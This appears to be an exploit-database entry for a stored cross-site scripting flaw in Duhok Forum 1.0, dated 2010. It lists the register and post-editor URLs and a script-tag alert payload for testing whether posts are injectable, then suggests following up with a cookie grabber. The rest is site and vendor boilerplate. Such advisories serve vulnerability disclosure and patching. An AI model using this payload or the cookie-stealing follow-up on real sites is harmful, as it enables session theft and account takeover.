Lucene search

K

Duhok Forum 1.0 script Cross Site Scripting Vulnerability

🗓️ 15 Mar 2010 00:00:00Reported by indoushkaType 
zdt
 zdt
🔗 0day.today👁 18 Views

Duhok Forum 1.0 XSS Vulnerability on Register and Post Edito

Show more
Code
=========================================================
Duhok Forum 1.0 script Cross Site Scripting Vulnerability
=========================================================

========================================================================================
| # Title    : Duhok Forum 1.0 script Cross Site Scripting Vulnerability
| # Author   : indoushka
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)
| # Bug      : XSS
======================      Exploit By indoushka       =================================
 # Exploit  :
 
 1 - http://127.0.0.1/st/index.php?mode=register&Approval=1 (1 register in to the web site)
 
 2 - http://127.0.0.1/st/index.php?mode=editor&method=topic&f=1&c=1 (2 past a new post )
 
Put this code 4 virified is infected or not <ScRiPt>alert(213771818860)</ScRiPt> a test post
 
 3- if it infected post a new post and use cookie Graber



#  0day.today [2018-01-11]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
15 Mar 2010 00:00Current
7.1High risk
Vulners AI Score7.1
18
.json
Report